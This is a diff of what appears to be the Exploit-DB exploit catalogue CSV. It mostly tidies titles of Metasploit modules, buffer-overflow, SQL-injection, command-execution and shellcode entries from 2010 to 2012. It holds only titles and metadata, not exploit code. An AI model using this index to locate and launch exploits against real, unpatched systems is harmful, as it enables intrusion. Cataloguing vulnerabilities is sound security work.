IRC Client Buffer Overflow Exploit",2010-10-09,metasploit,osx,remote,0 +16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client - Buffer Overflow Exploit (OSX)",2010-10-09,metasploit,osx,remote,0 16865,platforms/osx/remote/16865.rb,"Arkeia Backup Client Type 77 - Overflow (Mac OS X)",2010-05-09,metasploit,osx,remote,0 16866,platforms/unix/remote/16866.rb,"Safari Archive Metadata Command Execution",2010-09-20,metasploit,unix,remote,0 16867,platforms/osx/remote/16867.rb,"Apple OS X Software Update Command Execution",2010-09-20,metasploit,osx,remote,0 -16868,platforms/hardware/remote/16868.rb,"iPhone MobileSafari LibTIFF Buffer Overflow",2010-09-20,metasploit,hardware,remote,0 +16868,platforms/hardware/remote/16868.rb,"iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2)",2010-09-20,metasploit,hardware,remote,0 16869,platforms/hardware/remote/16869.rb,"iPhone MobileMail LibTIFF Buffer Overflow",2010-09-20,metasploit,hardware,remote,0 16870,platforms/multiple/remote/16870.rb,"Mail.app Image Attachment Command Execution",2011-03-05,metasploit,multiple,remote,0 16871,platforms/osx/remote/16871.rb,"Mac OS X mDNSResponder UPnP Location Overflow",2011-01-08,metasploit,osx,remote,0 16872,platforms/osx/remote/16872.rb,"WebSTAR FTP Server USER Overflow",2010-09-20,metasploit,osx,remote,0 16873,platforms/osx/remote/16873.rb,"MacOS X QuickTime RTSP Content-Type Overflow",2010-10-09,metasploit,osx,remote,0 16874,platforms/osx/remote/16874.rb,"MacOS X EvoCam HTTP GET Buffer Overflow",2010-10-09,metasploit,osx,remote,0 -16875,platforms/osx/remote/16875.rb,"Samba lsa_io_trans_names Heap Overflow",2010-04-05,metasploit,osx,remote,0 -16876,platforms/osx_ppc/remote/16876.rb,"Samba trans2open Overflow (Mac OS X PPC)",2010-06-21,metasploit,osx_ppc,remote,0 +16875,platforms/osx/remote/16875.rb,"Samba lsa_io_trans_names Heap Overflow (OSX)",2010-04-05,metasploit,osx,remote,0 +16876,platforms/osx_ppc/remote/16876.rb,"Samba - trans2open Overflow (Mac OS X PPC)",2010-06-21,metasploit,osx_ppc,remote,0 16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter Command Execution",2010-10-06,metasploit,irix,remote,0 -16878,platforms/linux/remote/16878.rb,"ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)",2010-12-02,metasploit,linux,remote,0 +16878,platforms/linux/remote/16878.rb,"ProFTPD 1.3.2rc3 - 1.3.3b - Telnet IAC Buffer Overflow (FreeBSD)",2010-12-02,metasploit,linux,remote,0 16879,platforms/freebsd/remote/16879.rb,"XTACACSD <= 4.1.2 report() Buffer Overflow",2010-05-09,metasploit,freebsd,remote,0 16880,platforms/linux/remote/16880.rb,"Samba trans2open - Overflow (*BSD x86)",2010-06-17,metasploit,linux,remote,0 16881,platforms/php/webapps/16881.rb,"Cacti graph_view.php Remote Command Execution",2010-07-03,metasploit,php,webapps,0 @@ -14693,20 +14689,20 @@ id,file,description,date,author,platform,type,port 16894,platforms/php/webapps/16894.rb,"TWiki Search Function Arbitrary Command Execution",2010-07-03,metasploit,php,webapps,0 16895,platforms/php/webapps/16895.rb,"WordPress cache_lastpostdate - Arbitrary Code Execution",2010-07-03,metasploit,php,webapps,0 16896,platforms/php/webapps/16896.rb,"vBulletin misc.php Template Name Arbitrary Code Execution",2010-07-25,metasploit,php,webapps,0 -16897,platforms/php/webapps/16897.rb,"BASE base_qry_common Remote File Include",2010-11-24,metasploit,php,webapps,0 +16897,platforms/php/webapps/16897.rb,"BASE - base_qry_common Remote File Include",2010-11-24,metasploit,php,webapps,0 16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution",2010-07-03,metasploit,php,webapps,0 16901,platforms/php/webapps/16901.rb,"PAJAX Remote Command Execution",2010-04-30,metasploit,php,webapps,0 16902,platforms/php/webapps/16902.rb,"CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit",2011-01-14,metasploit,php,webapps,0 16903,platforms/php/remote/16903.rb,"OpenX banner-edit.php File Upload PHP Code Execution",2010-09-20,metasploit,php,remote,0 16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion",2011-01-08,metasploit,php,webapps,0 -16905,platforms/cgi/webapps/16905.rb,"AWStats (6.1-6.2) configdir Remote Command Execution",2009-12-26,metasploit,cgi,webapps,0 +16905,platforms/cgi/webapps/16905.rb,"AWStats (6.1-6.2) - configdir Remote Command Execution",2009-12-26,metasploit,cgi,webapps,0 16906,platforms/php/webapps/16906.rb,"Joomla 1.5.12 TinyBrowser File Upload Code Execution",2010-06-15,metasploit,php,webapps,0 16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet Command Execution",2010-07-01,metasploit,hardware,webapps,0 16908,platforms/cgi/webapps/16908.rb,"Nagios3 statuswml.cgi Ping Command Execution",2010-07-14,metasploit,cgi,webapps,0 16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution",2010-07-03,metasploit,php,webapps,0 16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection",2011-01-08,metasploit,linux,remote,0 16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula Remote PHP Code Execution",2010-09-20,metasploit,php,webapps,0 -16912,platforms/php/webapps/16912.rb,"Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include",2010-11-24,metasploit,php,webapps,0 +16912,platforms/php/webapps/16912.rb,"Mambo - Cache_Lite Class mosConfig_absolute_path Remote File Include",2010-11-24,metasploit,php,webapps,0 16913,platforms/php/webapps/16913.rb,"phpMyAdmin - Config File Code Injection",2010-07-03,metasploit,php,webapps,0 16914,platforms/cgi/webapps/16914.rb,"Matt Wright guestbook.pl Arbitrary Command Execution",2010-07-03,metasploit,cgi,webapps,0 16915,platforms/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent Command Injection",2010-10-25,metasploit,linux,remote,0 @@ -14748,7 +14744,7 @@ id,file,description,date,author,platform,type,port 16952,platforms/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 - TCP_MAXSEG Kernel Panic DoS (2)",2011-03-10,zx2c4,linux,dos,0 16953,platforms/asp/webapps/16953.txt,"Luch Web Designer Multiple SQL Injection Vulnerabilities",2011-03-10,p0pc0rn,asp,webapps,0 16954,platforms/php/webapps/16954.txt,"Keynect Ecommerce SQL Injection Vulnerability",2011-03-10,"Arturo Zamora",php,webapps,0 -16955,platforms/asp/webapps/16955.txt,"smartermail 7.3 & 7.4 - Multiple Vulnerabilities",2011-03-10,"Hoyt LLC Research",asp,webapps,0 +16955,platforms/asp/webapps/16955.txt,"SmarterMail 7.3 & 7.4 - Multiple Vulnerabilities",2011-03-10,"Hoyt LLC Research",asp,webapps,0 16956,platforms/windows/remote/16956.rb,"Novell iPrint Client ActiveX Control <= 5.52 - Buffer Overflow",2011-03-07,metasploit,windows,remote,0 16957,platforms/windows/remote/16957.rb,"Oracle MySQL for Microsoft Windows Payload Execution",2011-03-08,metasploit,windows,remote,0 16959,platforms/multiple/webapps/16959.txt,"Oracle WebLogic Session Fixation Via HTTP POST",2011-03-11,"Roberto Suggi Liverani",multiple,webapps,0 @@ -14771,7 +14767,7 @@ id,file,description,date,author,platform,type,port 16977,platforms/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 - (.fcd) Buffer Overflow Exploit",2011-03-14,h1ch4m,windows,local,0 16978,platforms/windows/local/16978.rb,"Foxit PDF Reader 4.2 Javascript File Write",2011-03-14,metasploit,windows,local,0 16979,platforms/windows/dos/16979.html,"Opera 11.01 NULL PTR Derefernce",2011-03-15,echo,windows,dos,0 -16980,platforms/php/webapps/16980.py,"If-CMS 2.07 Pre-Auth Local File Inclusion Exploit",2011-03-15,TecR0c,php,webapps,0 +16980,platforms/php/webapps/16980.py,"If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (1)",2011-03-15,TecR0c,php,webapps,0 16982,platforms/php/webapps/16982.txt,"lotuscms 3.0.3 - Multiple Vulnerabilities",2011-03-16,"High-Tech Bridge SA",php,webapps,0 16984,platforms/windows/remote/16984.rb,"HP OpenView Performance Insight Server Backdoor Account Code Execution",2011-03-15,metasploit,windows,remote,0 16985,platforms/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal",2011-03-16,metasploit,multiple,remote,0 @@ -14831,7 +14827,7 @@ id,file,description,date,author,platform,type,port 17043,platforms/windows/remote/17043.rb,"HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow",2011-03-23,metasploit,windows,remote,0 17044,platforms/windows/remote/17044.rb,"HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow",2011-03-23,metasploit,windows,remote,0 17045,platforms/windows/dos/17045.py,"Avaya IP Office Manager 8.1 TFTP - DoS",2011-03-24,"Craig Freyman",windows,dos,69 -17046,platforms/php/webapps/17046.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities",2011-03-24,"High-Tech Bridge SA",php,webapps,0 +17046,platforms/php/webapps/17046.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities (2)",2011-03-24,"High-Tech Bridge SA",php,webapps,0 17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow",2011-03-25,metasploit,windows,remote,0 17048,platforms/windows/remote/17048.rb,"VLC - AMV Dangling Pointer Vulnerability",2011-03-26,metasploit,windows,remote,0 17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 (POST) Stored XSS And XML Injection",2011-03-26,LiquidWorm,php,webapps,0 @@ -14933,9 +14929,9 @@ id,file,description,date,author,platform,type,port 17157,platforms/windows/local/17157.py,"Wordtrainer 3.0 - (.ord) Buffer Overflow Vulnerability",2011-04-12,"C4SS!0 G0M3S",windows,local,0 17158,platforms/windows/local/17158.txt,"Microsoft HTML Help <= 6.1 - Stack Overflow",2011-04-12,"Luigi Auriemma",windows,local,0 17159,platforms/windows/dos/17159.txt,"Microsoft Host Integration Server <= 8.5.4224.0 DoS Vulnerabilities",2011-04-12,"Luigi Auriemma",windows,dos,0 -17160,platforms/windows/dos/17160.txt,"Microsoft Reader <= 2.1.1.3143 Integer Overflow",2011-04-12,"Luigi Auriemma",windows,dos,0 +17160,platforms/windows/dos/17160.txt,"Microsoft Reader <= 2.1.1.3143 - Integer Overflow (1)",2011-04-12,"Luigi Auriemma",windows,dos,0 17161,platforms/windows/dos/17161.txt,"Microsoft Reader <= 2.1.1.3143 Heap Overflow",2011-04-12,"Luigi Auriemma",windows,dos,0 -17162,platforms/windows/dos/17162.txt,"Microsoft Reader <= 2.1.1.3143 Integer Overflow",2011-04-12,"Luigi Auriemma",windows,dos,0 +17162,platforms/windows/dos/17162.txt,"Microsoft Reader <= 2.1.1.3143 - Integer Overflow (2)",2011-04-12,"Luigi Auriemma",windows,dos,0 17163,platforms/windows/dos/17163.txt,"Microsoft Reader <= 2.1.1.3143 Array Overflow",2011-04-12,"Luigi Auriemma",windows,dos,0 17164,platforms/windows/dos/17164.txt,"Microsoft Reader <= 2.1.1.3143 NULL Byte Write",2011-04-12,"Luigi Auriemma",windows,dos,0 17165,platforms/php/webapps/17165.py,"TinyBB 1.4 - Blind SQL Injection and Path Disclosure",2011-04-13,swami,php,webapps,0 @@ -14953,7 +14949,7 @@ id,file,description,date,author,platform,type,port 17188,platforms/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos,0 17187,platforms/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (DEP+ASLR bypass)",2011-04-19,Abysssec,windows,remote,0 17185,platforms/windows/local/17185.py,"Wireshark 1.4.1-1.4.4 - SEH Overflow Exploit",2011-04-18,sickness,windows,local,0 -17186,platforms/windows/local/17186.rb,"Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow",2011-04-19,metasploit,windows,local,0 +17186,platforms/windows/local/17186.rb,"Wireshark <= 1.4.4 - packet-dect.c Stack Buffer Overflow (1)",2011-04-19,metasploit,windows,local,0 17197,platforms/php/webapps/17197.txt,"First Escort Marketing CMS - Multiple SQL Injection Vunerabilities",2011-04-22,NoNameMT,php,webapps,0 17198,platforms/php/webapps/17198.txt,"360 Web Manager 3.0 - Multiple Vulnerabilities",2011-04-22,"Ignacio Garrido",php,webapps,0 17190,platforms/php/webapps/17190.txt,"dalbum 1.43 - Multiple Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0 @@ -14961,7 +14957,7 @@ id,file,description,date,author,platform,type,port 17192,platforms/php/webapps/17192.html,"docuFORM Mercury WebApp 6.16a/5.20 - Multiple XSS Vulnerabilities",2011-04-20,LiquidWorm,php,webapps,0 17193,platforms/php/webapps/17193.html,"SocialCMS1.0.2 - Multiple CSRF Vulnerabilities",2011-04-20,"vir0e5 ",php,webapps,0 17194,platforms/linux/shellcode/17194.txt,"Linux/x86 - netcat bindshell port 6666 - 69 bytes",2011-04-21,"Jonathan Salwan",linux,shellcode,0 -17195,platforms/windows/remote/17195.rb,"Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow",2011-04-19,metasploit,windows,remote,0 +17195,platforms/windows/remote/17195.rb,"Wireshark <= 1.4.4 - packet-dect.c Stack Buffer Overflow (2)",2011-04-19,metasploit,windows,remote,0 17199,platforms/unix/remote/17199.rb,"Spreecommerce < 0.50.0 - Arbitrary Command Execution",2011-04-21,metasploit,unix,remote,0 17200,platforms/php/webapps/17200.txt,"ZenPhoto 1.4.0.3 x-forwarded-for HTTP Header presisitent XSS",2011-04-22,Saif,php,webapps,0 17201,platforms/multiple/dos/17201.php,"PHP phar extension 1.1.1 - Heap Overflow",2011-04-22,"Alexander Gavrun",multiple,dos,0 @@ -15137,7 +15133,7 @@ id,file,description,date,author,platform,type,port 17415,platforms/windows/remote/17415.rb,"Black Ice Cover Page SDK insecure method DownloadImageFileURL() Exploit",2011-06-20,mr_me,windows,remote,0 17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution Exploit",2011-06-20,mr_me,windows,remote,0 17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow",2011-06-20,metasploit,windows,remote,0 -17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 Pre-Auth Local File Inclusion Exploit",2011-06-20,TecR0c,php,webapps,0 +17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (2)",2011-06-20,TecR0c,php,webapps,0 17419,platforms/windows/remote/17419.zip,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer Exploit",2011-06-20,Abysssec,windows,remote,0 17421,platforms/windows/dos/17421.py,"XnView 1.98 - Denial of Service Vulnerability PoC",2011-06-20,BraniX,windows,dos,0 17422,platforms/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download Vulnerability",2011-06-21,ShellVision,hardware,remote,0 @@ -15208,7 +15204,7 @@ id,file,description,date,author,platform,type,port 17499,platforms/windows/local/17499.rb,"CoolPlayer Portable 2.19.2 - Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",windows,local,0 17500,platforms/php/webapps/17500.txt,"LuxCal Web Calendar 2.4.2 & 2.5.0 - SQL Injection Vulnerability",2011-07-07,kaMtiEz,php,webapps,0 17501,platforms/hardware/dos/17501.py,"Dlink DSL-2650U DoS/PoC",2011-07-07,"Li'el Fridman",hardware,dos,0 -17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow",2011-07-07,metasploit,windows,local,0 +17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 - (MPPL File) Stack Buffer Overflow",2011-07-07,metasploit,windows,local,0 17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk <= 8.0.0.12 Database Disclosure Exploit",2011-07-07,@ygoltsev,jsp,webapps,0 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal Vulnerability",2011-07-08,"SecPod Research",hardware,remote,0 39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 SEH Overflow",2016-04-05,metasploit,windows,remote,80 @@ -15236,7 +15232,6 @@ id,file,description,date,author,platform,type,port 17532,platforms/php/webapps/17532.txt,"PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injection Vulnerabilities",2011-07-14,LiquidWorm,php,webapps,0 17533,platforms/php/webapps/17533.txt,"Inscribe Webmedia - SQL Injection Vulnerability",2011-07-14,Netrondoank,php,webapps,0 17535,platforms/multiple/remote/17535.rb,"Java RMI Server Insecure Default Configuration Java Code Execution",2011-07-15,metasploit,multiple,remote,0 -17536,platforms/windows/remote/17536.rb,"HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow",2011-07-16,metasploit,windows,remote,0 17537,platforms/windows/remote/17537.rb,"HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow",2011-07-16,metasploit,windows,remote,0 17539,platforms/windows/remote/17539.rb,"FreeFloat FTP Server 1.00 - MKD Buffer Overflow Exploit",2011-07-17,"C4SS!0 G0M3S",windows,remote,0 17540,platforms/windows/remote/17540.rb,"Freefloat FTP Server MKD Buffer Overflow (Metasploit)",2011-07-18,"James Fitts",windows,remote,0 @@ -15296,7 +15291,7 @@ id,file,description,date,author,platform,type,port 17607,platforms/windows/local/17607.rb,"FreeAmp 2.0.7 - (.fat) Buffer Overflow Exploit (Metasploit)",2011-08-04,"James Fitts",windows,local,0 17610,platforms/multiple/dos/17610.py,"OpenSLP 1.2.1 & < 1647 trunk - Denial of Service Exploit",2011-08-05,"Nicolas Gregoire",multiple,dos,0 17611,platforms/linux/local/17611.pl,"Unrar 3.9.3 - Local Stack Overflow Exploit",2011-08-05,ZadYree,linux,local,0 -17612,platforms/windows/remote/17612.rb,"Firefox 3.6.16 OBJECT mChannel Remote Code Execution Exploit (DEP bypass)",2011-08-05,Rh0,windows,remote,0 +17612,platforms/windows/remote/17612.rb,"Firefox 3.6.16 - OBJECT mChannel Remote Code Execution Exploit (DEP Bypass)",2011-08-05,Rh0,windows,remote,0 17613,platforms/php/webapps/17613.php,"WordPress Plugin E-commerce <= 3.8.4 - SQL Injection Exploit",2011-08-05,IHTeam,php,webapps,0 17614,platforms/hp-ux/remote/17614.sh,"HP Data Protector Remote Shell for HP-UX",2011-08-05,"Adrian Puente Z.",hp-ux,remote,0 17615,platforms/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server Authenticated Code Execution",2011-08-05,metasploit,jsp,webapps,0 @@ -15328,7 +15323,7 @@ id,file,description,date,author,platform,type,port 17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass Exploit",2011-08-10,"C4SS!0 G0M3S",windows,local,0 17648,platforms/linux/remote/17648.sh,"HP Data Protector - Remote Root Shell (Linux)",2011-08-10,SZ,linux,remote,0 17649,platforms/windows/remote/17649.py,"BisonFTP Server <= 3.5 - Remote Buffer Overflow Exploit",2011-08-10,localh0t,windows,remote,0 -17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 mChannel use after free Vulnerability",2011-08-10,metasploit,windows,remote,0 +17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 - mChannel use after free Vulnerability (1)",2011-08-10,metasploit,windows,remote,0 17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0 17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass Exploit",2011-08-11,"C4SS!0 G0M3S",windows,local,0 17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 - Trusted Integer Dereference",2011-08-11,metasploit,windows,remote,0 @@ -15342,7 +15337,7 @@ id,file,description,date,author,platform,type,port 17670,platforms/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",hardware,remote,0 17664,platforms/windows/dos/17664.py,"NSHC Papyrus 2.0 - Heap Overflow Vulnerability",2011-08-13,wh1ant,windows,dos,0 17667,platforms/php/webapps/17667.php,"Contrexx Shopsystem <= 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0 -17669,platforms/windows/remote/17669.py,"Simple HTTPd 1.42 PUT Request Remote Buffer Overflow Vulnerability",2011-08-15,nion,windows,remote,0 +17669,platforms/windows/remote/17669.py,"Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow Vulnerability",2011-08-15,nion,windows,remote,0 17672,platforms/windows/remote/17672.html,"Mozilla Firefox 3.6.16 - mChannel Object Use After Free Exploit (Windows 7)",2011-08-16,mr_me,windows,remote,0 17673,platforms/php/webapps/17673.txt,"WordPress IP-Logger Plugin <= 3.0 - SQL Injection Vulnerability",2011-08-16,"Miroslav Stampar",php,webapps,0 17674,platforms/php/webapps/17674.txt,"Joomla JoomTouch Component Local File Inclusion Vulnerability",2011-08-17,NoGe,php,webapps,0 @@ -15408,7 +15403,7 @@ id,file,description,date,author,platform,type,port 17740,platforms/php/webapps/17740.txt,"WordPress mySTAT plugin <= 2.6 - SQL Injection Vulnerability",2011-08-28,"Miroslav Stampar",php,webapps,0 17741,platforms/php/webapps/17741.txt,"Omnistar Mailer - Multiple Vulnerabilities",2011-08-28,Sid3^effects,php,webapps,0 17742,platforms/windows/dos/17742.py,"Mini FTP Server 1.1 - Buffer Corruption Remote Denial of Service",2011-08-28,LiquidWorm,windows,dos,0 -17743,platforms/php/webapps/17743.rb,"LifeSize Room Command Injection",2011-08-28,"Spencer McIntyre",php,webapps,0 +17743,platforms/php/webapps/17743.rb,"LifeSize Room - Command Injection",2011-08-28,"Spencer McIntyre",php,webapps,0 17744,platforms/windows/local/17744.pl,"Mini-stream Ripper 2.9.7.273 - (.m3u) Universal BoF",2011-08-29,"D3r K0n!G",windows,local,0 17745,platforms/windows/local/17745.pl,"DVD X Player 5.5 Professional (.plf) Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0 17748,platforms/php/webapps/17748.txt,"WordPress SH Slideshow plugin <= 3.1.4 - SQL Injection Vulnerability",2011-08-29,"Miroslav Stampar",php,webapps,0 @@ -15443,10 +15438,10 @@ id,file,description,date,author,platform,type,port 17780,platforms/windows/local/17780.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass)",2011-09-05,blake,windows,local,0 17781,platforms/windows/dos/17781.pl,"World Of Warcraft Local Stack Overflow DoS Exploit (chat-cache.txt)",2011-09-05,"BSOD Digital",windows,dos,0 17782,platforms/php/webapps/17782.txt,"Elite Gaming Ladders 3.6 - SQL Injection Vulnerability",2011-09-05,J.O,php,webapps,0 -17783,platforms/windows/local/17783.pl,"ZipX for Windows 1.71 ZIP File - Buffer Overflow Exploit",2011-09-05,"C4SS!0 G0M3S",windows,local,0 +17783,platforms/windows/local/17783.pl,"ZipX 1.71 - ZIP File Buffer Overflow Exploit",2011-09-05,"C4SS!0 G0M3S",windows,local,0 17785,platforms/windows/dos/17785.pl,"TOWeb 3.0 - Local Format String DoS Exploit (TOWeb.MO file corruption)",2011-09-05,"BSOD Digital",windows,dos,0 17786,platforms/php/webapps/17786.txt,"Webmobo WB News System Blind SQL Injection",2011-09-05,"Eyup CELIK",php,webapps,0 -17788,platforms/windows/local/17788.py,"DVD X Player 5.5 Pro SEH Overwrite",2011-09-06,blake,windows,local,0 +17788,platforms/windows/local/17788.py,"DVD X Player 5.5 Pro - SEH Overwrite",2011-09-06,blake,windows,local,0 17789,platforms/php/webapps/17789.txt,"WordPress Tweet Old Post plugin <= 3.2.5 - SQL Injection Vulnerability",2011-09-06,sherl0ck_,php,webapps,0 17790,platforms/php/webapps/17790.txt,"WordPress post highlights plugin <= 2.2 - SQL Injection Vulnerability",2011-09-06,"Miroslav Stampar",php,webapps,0 17791,platforms/php/webapps/17791.txt,"WordPress KNR Author List Widget plugin <= 2.0.0 - SQL Injection Vulnerability",2011-09-06,"Miroslav Stampar",php,webapps,0 @@ -15459,7 +15454,7 @@ id,file,description,date,author,platform,type,port 17798,platforms/php/webapps/17798.txt,"WordPress Community Events plugin <= 1.2.1 - SQL Injection Vulnerability",2011-09-08,"Miroslav Stampar",php,webapps,0 17800,platforms/php/webapps/17800.txt,"AM4SS 1.2 - CSRF add admin Vulnerability",2011-09-08,"red virus",php,webapps,0 17801,platforms/php/webapps/17801.rb,"WordPress 1 Flash Gallery Plugin - Arbiraty File Upload Exploit (Metasploit)",2011-09-08,"Ben Schmidt",php,webapps,0 -17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro (SEH DEP + ASLR Bypass) Exploit",2011-09-08,Rew,windows,local,0 +17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro - (SEH DEP + ASLR Bypass) Exploit",2011-09-08,Rew,windows,local,0 21788,platforms/windows/dos/21788.pl,"FastStone Image Viewer 4.6 - ReadAVonIP Crash PoC",2012-10-07,"Jean Pascal Pereira",windows,dos,0 21787,platforms/php/webapps/21787.rb,"MyAuth3 - Blind SQL Injection",2012-10-07,"Marcio Almeida",php,webapps,0 17806,platforms/linux/dos/17806.txt,"FTP Client (Ubuntu <= 11.04) - Local Buffer Overflow Crash PoC",2011-09-08,localh0t,linux,dos,0 @@ -15474,7 +15469,7 @@ id,file,description,date,author,platform,type,port 17816,platforms/php/webapps/17816.txt,"WordPress Tune Library plugin <= 2.17 - SQL Injection Vulnerability",2011-09-10,"Miroslav Stampar",php,webapps,0 17817,platforms/windows/local/17817.php,"ScadaTEC ModbusTagServer & ScadaPhone (.zip) Buffer Overflow Exploit (0day)",2011-09-12,mr_me,windows,local,0 17818,platforms/php/webapps/17818.txt,"TomatoCart 1.1 Post Auth Local File Inclusion Vulnerability",2011-09-12,brain[pillow],php,webapps,0 -17819,platforms/windows/remote/17819.py,"KnFTP Server Buffer Overflow Exploit",2011-09-12,blake,windows,remote,0 +17819,platforms/windows/remote/17819.py,"KnFTP Server - Buffer Overflow Exploit",2011-09-12,blake,windows,remote,0 17820,platforms/windows/local/17820.c,"Aika 0.2 colladaconverter Xml Parsing Buffer Overflow",2011-09-12,isciurus,windows,local,0 17821,platforms/windows/local/17821.py,"Wav Player 1.1.3.6 - (.pll) Buffer Overflow Exploit",2011-09-12,"Iván García Ferreira",windows,local,0 17822,platforms/php/webapps/17822.txt,"PHP Support Tickets 2.2 - Code Execution",2011-09-12,brain[pillow],php,webapps,0 @@ -15527,7 +15522,7 @@ id,file,description,date,author,platform,type,port 17872,platforms/php/webapps/17872.txt,"Multiple WordPress Plugin - timthumb.php Vulnerabilites",2011-09-19,"Ben Schmidt",php,webapps,0 17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File disclosure via XEE",2011-09-20,"Nicolas Gregoire",windows,webapps,0 17874,platforms/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF",2011-09-20,"Sense of Security",hardware,webapps,0 -17876,platforms/windows/remote/17876.py,"ScriptFTP <= 3.3 - Remote Buffer Overflow (LIST)",2011-09-20,modpr0be,windows,remote,0 +17876,platforms/windows/remote/17876.py,"ScriptFTP <= 3.3 - Remote Buffer Overflow (LIST) (1)",2011-09-20,modpr0be,windows,remote,0 17877,platforms/windows/local/17877.py,"AVCon DEP Bypass",2011-09-20,blake,windows,local,0 17878,platforms/windows/dos/17878.txt,"EViews <= 7.0.0.1 (aka 7.2) Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 17879,platforms/windows/dos/17879.txt,"MetaServer RT <= 3.2.1.450 - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 @@ -15579,7 +15574,7 @@ id,file,description,date,author,platform,type,port 17936,platforms/windows/remote/17936.rb,"Opera 10/11 (bad nesting with frameset tag) Memory Corruption",2011-10-06,"Jose A. Vazquez",windows,remote,0 17937,platforms/php/webapps/17937.txt,"URL Shortener Script 1.0 - SQL Injection Vulnerability",2011-10-07,M.Jock3R,php,webapps,0 17938,platforms/php/webapps/17938.txt,"EFront <= 3.6.9 Community Edition - Multiple Vulnerabilities",2011-10-07,IHTeam,php,webapps,0 -17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional Universal DEP+ASLR Bypass",2011-10-07,modpr0be,windows,local,0 +17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal DEP+ASLR Bypass",2011-10-07,modpr0be,windows,local,0 17940,platforms/linux_mips/shellcode/17940.c,"52 byte Linux MIPS execve",2011-10-07,entropy,linux_mips,shellcode,0 17941,platforms/linux/webapps/17941.rb,"Spreecommerce 0.60.1 - Arbitrary Command Execution",2011-10-07,metasploit,linux,webapps,0 17942,platforms/linux/local/17942.c,"pkexec - Race Condition Privilege Escalation Exploit",2011-10-08,xi4oyu,linux,local,0 @@ -15587,7 +15582,7 @@ id,file,description,date,author,platform,type,port 17944,platforms/php/webapps/17944.txt,"Joomla Component Time Returns (com_timereturns) 2.0 - SQL Injection",2011-10-08,kaMtiEz,php,webapps,0 17946,platforms/php/webapps/17946.txt,"NexusPHP 1.5 - SQL Injection",2011-10-08,flyh4t,php,webapps,0 17947,platforms/php/webapps/17947.rb,"Snortreport nmap.php and nbtscan.php Remote Command Execution",2011-10-09,metasploit,php,webapps,0 